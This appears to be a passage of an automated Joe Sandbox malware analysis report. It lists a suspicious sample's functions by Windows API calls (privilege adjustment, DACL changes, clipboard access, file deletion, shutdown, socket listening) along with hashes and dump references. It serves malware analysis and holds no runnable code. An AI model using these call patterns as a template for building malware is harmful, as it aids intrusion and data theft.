                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007612D1
                          • GetProcessWindowStation.USER32 ref: 007612EA
                          • SetProcessWindowStation.USER32(00000000), ref: 007612F4
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00761310
                            • Part of subcall function 007610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007611FC), ref: 007610D4
                            • Part of subcall function 007610BF: CloseHandle.KERNEL32(?,?,007611FC), ref: 007610E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                          • String ID: $default$winsta0$Z|
                          • API String ID: 22674027-2860067467
                          • Opcode ID: c7f4781a33dd6e54c9418b550830dcd27feae9ee387faed501d9f9d81b2b8da4
                          • Instruction ID: e091b97bd172c2b3f46c4c9e62a95b7f359bf8f2c536893fb7b0676a32c77ebe
                          • Opcode Fuzzy Hash: c7f4781a33dd6e54c9418b550830dcd27feae9ee387faed501d9f9d81b2b8da4
                          • Instruction Fuzzy Hash: 98819B71900248AFDF218FA4DC49FEE7FB9EF04700F18812AFD12A61A0CB399945CB65
                          Function 00760B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
                            • Part of subcall function 007610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
                            • Part of subcall function 007610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
                            • Part of subcall function 007610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761136
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00760BCC
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00760C00
                          • GetLengthSid.ADVAPI32(?), ref: 00760C17
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00760C51
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00760C6D
                          • GetLengthSid.ADVAPI32(?), ref: 00760C84
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00760C8C
                          • HeapAlloc.KERNEL32(00000000), ref: 00760C93
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00760CB4
                          • CopySid.ADVAPI32(00000000), ref: 00760CBB
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00760CEA
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00760D0C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00760D1E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D45
                          • HeapFree.KERNEL32(00000000), ref: 00760D4C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D55
                          • HeapFree.KERNEL32(00000000), ref: 00760D5C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D65
                          • HeapFree.KERNEL32(00000000), ref: 00760D6C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00760D78
                          • HeapFree.KERNEL32(00000000), ref: 00760D7F
                            • Part of subcall function 00761193: GetProcessHeap.KERNEL32(00000008,00760BB1,?,00000000,?,00760BB1,?), ref: 007611A1
                            • Part of subcall function 00761193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00760BB1,?), ref: 007611A8
                            • Part of subcall function 00761193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00760BB1,?), ref: 007611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: dd4846010f8c237fbc13e91d2a0351a29fa501860b2caf834ba51c6cb2b60717
                          • Instruction ID: c50aea6592514775f21f96e81fff12eff2e924226aec67e1fa1d71e0f6badb5c
                          • Opcode Fuzzy Hash: dd4846010f8c237fbc13e91d2a0351a29fa501860b2caf834ba51c6cb2b60717
                          • Instruction Fuzzy Hash: A2715E71A0020AAFDF11DFA4DC49BEFBBB8BF05300F048615ED15A6291D779A906CBA4
                          Function 0077EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(0079CC08), ref: 0077EB29
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0077EB37
                          • GetClipboardData.USER32(0000000D), ref: 0077EB43
                          • CloseClipboard.USER32 ref: 0077EB4F
                          • GlobalLock.KERNEL32(00000000), ref: 0077EB87
                          • CloseClipboard.USER32 ref: 0077EB91
                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0077EBBC
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0077EBC9
                          • GetClipboardData.USER32(00000001), ref: 0077EBD1
                          • GlobalLock.KERNEL32(00000000), ref: 0077EBE2
                          • GlobalUnlock.KERNEL32(00000000,?), ref: 0077EC22
                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0077EC38
                          • GetClipboardData.USER32(0000000F), ref: 0077EC44
                          • GlobalLock.KERNEL32(00000000), ref: 0077EC55
                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0077EC77
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0077EC94
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0077ECD2
                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0077ECF3
                          • CountClipboardFormats.USER32 ref: 0077ED14
                          • CloseClipboard.USER32 ref: 0077ED59
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                          • String ID:
                          • API String ID: 420908878-0
                          • Opcode ID: 267445dfb915418429015c75a32b1d592a6502a299b4f803a0cb88d77d560187
                          • Instruction ID: 960a4d69a915933fde2922a5013d36d7f727826d5741638e11ff1a4aa028e8fa
                          • Opcode Fuzzy Hash: 267445dfb915418429015c75a32b1d592a6502a299b4f803a0cb88d77d560187
                          • Instruction Fuzzy Hash: 3161D474204301DFDB11EF24D889F2ABBE4AF88744F04855AF45A972E2DB39DD06CB62
                          Function 0077698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 007769BE
                          • FindClose.KERNEL32(00000000), ref: 00776A12
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00776A4E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00776A75
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00776AB2
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00776ADF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                          • API String ID: 3830820486-3289030164
                          • Opcode ID: d71008ba25c901a7c38fc60778badfdc8ef58948fa6c10d8fd611915a5492adc
                          • Instruction ID: 3a84b51d95556f28570430d5d6396d254e1333a9db1c8b3c91c4715c3755c60c
                          • Opcode Fuzzy Hash: d71008ba25c901a7c38fc60778badfdc8ef58948fa6c10d8fd611915a5492adc
                          • Instruction Fuzzy Hash: 15D131B2508340EFC714EB64C895EABB7ECAF88704F444A1DF589D7191EB78EA44C762
                          Function 00779642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00779663
                          • GetFileAttributesW.KERNEL32(?), ref: 007796A1
                          • SetFileAttributesW.KERNEL32(?,?), ref: 007796BB
                          • FindNextFileW.KERNEL32(00000000,?), ref: 007796D3
                          • FindClose.KERNEL32(00000000), ref: 007796DE
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007796FA
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0077974A
                          • SetCurrentDirectoryW.KERNEL32(007C6B7C), ref: 00779768
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00779772
                          • FindClose.KERNEL32(00000000), ref: 0077977F
                          • FindClose.KERNEL32(00000000), ref: 0077978F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1409584000-438819550
                          • Opcode ID: e664f0f1051dc6a23af70f3447d7c351be286cd7c67c1f02ccc8b613a0fbb1e9
                          • Instruction ID: d9607ec1facca1690f225f3b49d93c859b719b4ea514c68d47d43b844b7c1318
                          • Opcode Fuzzy Hash: e664f0f1051dc6a23af70f3447d7c351be286cd7c67c1f02ccc8b613a0fbb1e9
                          • Instruction Fuzzy Hash: 9D31D572542219ABDF15EFB4EC49EDE77BCAF09360F108166FA09E2090DB3CDD418A64
                          Function 0077979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007797BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00779819
                          • FindClose.KERNEL32(00000000), ref: 00779824
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00779840
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00779890
                          • SetCurrentDirectoryW.KERNEL32(007C6B7C), ref: 007798AE
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007798B8
                          • FindClose.KERNEL32(00000000), ref: 007798C5
                          • FindClose.KERNEL32(00000000), ref: 007798D5
                            • Part of subcall function 0076DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0076DB00
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 2640511053-438819550
                          • Opcode ID: 06e380a8440d3d394990a2897ef6c35b812df0eb7b3bcce1b054c8a8a708457a
                          • Instruction ID: a0c6deb0b67c94467a8483de8c606cd28f2394106fc79c2c3c377961c4e7cabb
                          • Opcode Fuzzy Hash: 06e380a8440d3d394990a2897ef6c35b812df0eb7b3bcce1b054c8a8a708457a
                          • Instruction Fuzzy Hash: 3231E371502219AAEF10EFB4EC49EDE77BCAF06360F14C19AE918A21D0DB38DD458B65
                          Function 00778195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00778257
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00778267
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00778273
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00778310
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00778324
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00778356
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0077838C
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00778395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local$System
                          • String ID: *.*
                          • API String ID: 1464919966-438819550
                          • Opcode ID: bebe881c75868d27041e3c3162fa17715d38a61a0568c06c8ffd5fc5e2cac2b8
                          • Instruction ID: 42f70a860f7affdd75cc275b9f9b7614fc0f9937904f7f1a29fe5c270ab7680e
                          • Opcode Fuzzy Hash: bebe881c75868d27041e3c3162fa17715d38a61a0568c06c8ffd5fc5e2cac2b8
                          • Instruction Fuzzy Hash: 22615BB2504305DFCB10EF64C8489AEB3E8FF89354F04891EF99987251DB39E945CB92
                          Function 0076D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                            • Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 0076D122
                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0076D1DD
                          • MoveFileW.KERNEL32(?,?), ref: 0076D1F0
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0076D20D
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076D237
                            • Part of subcall function 0076D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0076D21C,?,?), ref: 0076D2B2
                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0076D253
                          • FindClose.KERNEL32(00000000), ref: 0076D264
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                          • String ID: \*.*
                          • API String ID: 1946585618-1173974218
                          • Opcode ID: f8d051b1eb0e77c1400bea9aacd3a9a72c02386863ad733fab87ce490ba05d05
                          • Instruction ID: feb0ed6acf6718f90a4833e3efe23926dbf0e439ec048a7971d29ac10f7085e1
                          • Opcode Fuzzy Hash: f8d051b1eb0e77c1400bea9aacd3a9a72c02386863ad733fab87ce490ba05d05
                          • Instruction Fuzzy Hash: CA614A31D0110DEFCF15EBA0C9969EEB7B9AF55300F248265E90277192EB386F09CB60
                          Function 0077ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: c8002dfe79cd7e2dcbaef3e9eb6a33011cfad66cea5468e791048f963c3307a6
                          • Instruction ID: 14294064a2a05e0d08bbae2edd0f04780d7fdb9cd9b9b35214d9cd5aa6bc1f79
                          • Opcode Fuzzy Hash: c8002dfe79cd7e2dcbaef3e9eb6a33011cfad66cea5468e791048f963c3307a6
                          • Instruction Fuzzy Hash: CB41A035204611EFEB21CF15D848B19BBE5FF48358F14C59AE4198B6A2C779EC42CB90
                          Function 0076E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
                            • Part of subcall function 007616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
                            • Part of subcall function 007616C3: GetLastError.KERNEL32 ref: 0076174A
                          • ExitWindowsEx.USER32(?,00000000), ref: 0076E932
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $ $@$SeShutdownPrivilege
                          • API String ID: 2234035333-3163812486
                          • Opcode ID: 079c04440e6a7c95b8cd2df4be49e1a9f9625f055606533f0c1287942623d0b4
                          • Instruction ID: 9f25e2d080851bc81d6a98e3f29476e829f5c27ef61817b2797d0698275ee110
                          • Opcode Fuzzy Hash: 079c04440e6a7c95b8cd2df4be49e1a9f9625f055606533f0c1287942623d0b4
                          • Instruction Fuzzy Hash: D301D676610311ABFF5466B49C8AFBB736CAF14750F194426FC03F21D1E5AD6C4085B5
                          Function 00781204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00781276
                          • WSAGetLastError.WSOCK32 ref: 00781283
                          • bind.WSOCK32(00000000,?,00000010), ref: 007812BA
                          • WSAGetLastError.WSOCK32 ref: 007812C5
                          • closesocket.WSOCK32(00000000), ref: 007812F4
                          • listen.WSOCK32(00000000,00000005), ref: 00781303
                          • WSAGetLastError.WSOCK32 ref: 0078130D
                          • closesocket.WSOCK32(00000000), ref: 0078133C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$closesocket$bindlistensocket
                          • String ID:
                          • API String ID: 540024437-0
                          • Opcode ID: 8f522e4cf7f51719736d1c61ebae8fda89f1a642e164cf020f9881336194650c
                          • Instruction ID: 37da988613070407c47d19f69bcceabc482f2d9b5d1b586e6777365a7773e2db
                          • Opcode Fuzzy Hash: 8f522e4cf7f51719736d1c61ebae8fda89f1a642e164cf020f9881336194650c
                          • Instruction Fuzzy Hash: 8D417231600110DFD710EF64C488B69BBE5BF46318F588199D8569F2D6C779ED82CBE1
                          Function 0073B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 0073B9D4
                          • _free.LIBCMT ref: 0073B9F8
                          • _free.LIBCMT ref: 0073BB7F
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007A3700), ref: 0073BB91
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0073BC09
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D1270,000000FF,?,0000003F,00000000,?), ref: 0073BC36
                          • _free.LIBCMT ref: 0073BD4B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID:
                          • API String ID: 314583886-0
                          • Opcode ID: b970fa2b46ca233e9f7d72c443c5598f25cb404a7653567a89eeeab3aa256cff
                          • Instruction ID: 726a2fd18a2aa0d3e046685bebde227021747fb7ee07cbfb42400e08e1c29dd8
                          • Opcode Fuzzy Hash: b970fa2b46ca233e9f7d72c443c5598f25cb404a7653567a89eeeab3aa256cff
                          • Instruction Fuzzy Hash: BDC13971A04214EFEB20DF789C45BAABBB9EF45310F14819AE694D7253EB389E41C750
                          Function 0076D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                            • Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 0076D420
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0076D470
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076D481
                          • FindClose.KERNEL32(00000000), ref: 0076D498
                          • FindClose.KERNEL32(00000000), ref: 0076D4A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                          • String ID: \*.*
                          • API String ID: 2649000838-1173974218
                          • Opcode ID: bebcc7d10633483c99b092a2d339b167474e63d6f23477accd65e55f4a2d7e9e
                          • Instruction ID: 125735dd14e6ee0fb4ea9f7b9513177fa6dc00129240e4896663e87cee17688a
                          • Opcode Fuzzy Hash: bebcc7d10633483c99b092a2d339b167474e63d6f23477accd65e55f4a2d7e9e
                          • Instruction Fuzzy Hash: 2D319071418385DBC715EF60C8958AFBBE8BE91300F448A1DF8D2521D1EB38AE09CB63
